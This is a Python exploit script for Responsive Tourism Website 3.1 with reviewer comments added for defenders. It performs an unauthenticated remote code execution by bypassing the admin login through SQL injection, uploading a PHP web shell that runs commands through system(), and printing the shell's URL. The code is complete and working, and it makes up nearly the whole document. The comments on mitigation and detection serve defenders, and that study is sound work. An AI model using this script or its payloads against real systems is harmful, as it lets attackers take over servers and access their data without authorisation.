Responsive Tourism Website 3.1 - Remote Code Execution (RCE) (Unauthenticated)
				
# Exploit Title: Responsive Tourism Website 3.1 - Remote Code Execution (RCE) (Unauthenticated)
# Date: 22.06.2021
# Exploit Author: Tagoletta (Tağmaç)
# Software Link: https://www.sourcecodester.com/php/14838/simple-responsive-tourism-website-using-php-free-source-code.html
# Version: V 3.1
# Tested on: MacOS & Windows
#
# NOTE(review): annotated for defenders. The listing chains three weaknesses
# that are each visible below: (1) the admin login accepts attacker-controlled
# quote/comment sequences in the credential fields, (2) the profile-image save
# endpoint stores a client-supplied filename ending in .php, and (3) the stored
# file is served from a web-accessible path where PHP executes. Any one of the
# controls named in the comments below breaks the chain.
# The source listing was flattened onto two lines; line breaks are restored
# here and no token other than comments was changed.

import requests
import random
import string
from bs4 import BeautifulSoup

# Target base URL, normalised to "scheme://host/" so paths can be appended.
url = input("TARGET = ")

if not url.startswith('http://') and not url.startswith('https://'):
    url = "http://" + url

if not url.endswith('/'):
    url = url + "/"

# One session so the PHP session cookie set on the first request is reused.
session = requests.Session()
session.get(url + 'admin/login.php')

print("- Bypassing login -")
login_url = url + "classes/Login.php?f=login"
# Both credential fields carry the same SQL-injection string; the fact that the
# rest of the script proceeds as an authenticated admin shows the login handler
# interpolates these values into its query. Mitigation: parameterised queries
# in classes/Login.php. Detection: POSTs to this endpoint whose username or
# password field contains quote or comment characters (' or #).
login_data = {"username": "admin' or '1'='1'#", "password": "admin' or '1'='1'#"}
session.post(login_url, cookies=session.cookies.get_dict(), data=login_data)

print("- Protecting User -")
# Read the current admin profile (id, first/last name, username) from the
# user page so the later save request resubmits them unchanged; the "save"
# endpoint below appears to overwrite the whole record, not just the image.
protectSettings_url = url + 'admin/?page=user'
protectSetting_html = session.get(protectSettings_url)
protectSettings_parser = BeautifulSoup(protectSetting_html.text, 'html.parser')
ids = protectSettings_parser.find('input', {'name':'id'}).get("value")
firstname = protectSettings_parser.find('input', {'id':'firstname'}).get("value")
lastname = protectSettings_parser.find('input', {'id':'lastname'}).get("value")
username = protectSettings_parser.find('input', {'id':'username'}).get("value")
print("User ID : " + ids)
print("First Name : " + firstname)
print("Last Name : " + lastname)
print("Username : " + username)
print("- OK -")

# Random 15-letter prefix for the uploaded filename (random, not secrets —
# it only serves to avoid name collisions, not as a secret).
let = string.ascii_lowercase
shellname = ''.join(random.choice(let) for i in range(15))

print("Shell uploading")
upload_url = url + "classes/Users.php?f=save"
# Hand-built multipart request with a fixed boundary; the Content-Type header
# below must match the boundary used in upload_data.
upload_headers = {"Accept": "*/*", "X-Requested-With": "XMLHttpRequest", "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundary7gB8BDj2OLQBJbBT", "Accept-Encoding": "gzip, deflate", "Accept-Language": "tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7", "Connection": "close"}
# The "image" body is PHP source that passes a query parameter to system().
# NOTE(review): the listing breaks this literal across two lines; it is joined
# here so the statement parses.
upload_payload = "<?php if(isset($_GET['cmd'])){ echo '<b>Tagoletta</b><pre>'; $cmd = ($_GET['cmd']); system($cmd); echo '</pre>'; die; } ?>"
# The "img" part declares a .php filename with Content-Type
# application/octet-stream and is accepted as the profile image — i.e. the
# save handler trusts the client-supplied extension and MIME type.
# Mitigation: allow-list extensions and verify image content server-side
# (e.g. re-encode through an image library), store uploads under a
# server-generated name outside the web root or in a directory with script
# execution disabled. Detection: file-integrity monitoring or web-server logs
# showing a .php file created under the image upload path.
upload_data = "------WebKitFormBoundary7gB8BDj2OLQBJbBT\r\nContent-Disposition: form-data; name=\"id\"\r\n\r\n"+ids+"\r\n------WebKitFormBoundary7gB8BDj2OLQBJbBT\r\nContent-Disposition: form-data; name=\"firstname\"\r\n\r\n"+firstname+"\r\n------WebKitFormBoundary7gB8BDj2OLQBJbBT\r\nContent-Disposition: form-data; name=\"lastname\"\r\n\r\n"+lastname+"\r\n------WebKitFormBoundary7gB8BDj2OLQBJbBT\r\nContent-Disposition: form-data; name=\"username\"\r\n\r\n"+username+"\r\n------WebKitFormBoundary7gB8BDj2OLQBJbBT\r\nContent-Disposition: form-data; name=\"password\"\r\n\r\n\r\n------WebKitFormBoundary7gB8BDj2OLQBJbBT\r\nContent-Disposition: form-data; name=\"img\"; filename=\""+shellname+"_Tagoletta.php\"\r\nContent-Type: application/octet-stream\r\n\r\n"+ upload_payload +"\r\n------WebKitFormBoundary7gB8BDj2OLQBJbBT--\r\n"
upload = session.post(upload_url, headers=upload_headers, data=upload_data)
# Only the HTTP status is checked; a 200 with an application-level error body
# would still be reported as success.
if upload.status_code == 200:
    print("- OK -")
    # The stored file's URL is taken from the profile <img id="cimg"> on the
    # admin page, which confirms the upload directory is web-reachable and the
    # original extension was kept. Serving uploads from a non-executing
    # location (or behind a handler that sets a safe Content-Type) removes
    # the code-execution step even if the upload check is bypassed.
    req = session.get(url + "/admin/?page=user", headers=session.headers)
    parser = BeautifulSoup(req.text, 'html.parser')
    find_shell = parser.find('img', {'id':'cimg'})
    print("Shell URL : " + find_shell.get("src") + "?cmd=whoami")
else:
    print("- NO :( -")
 
 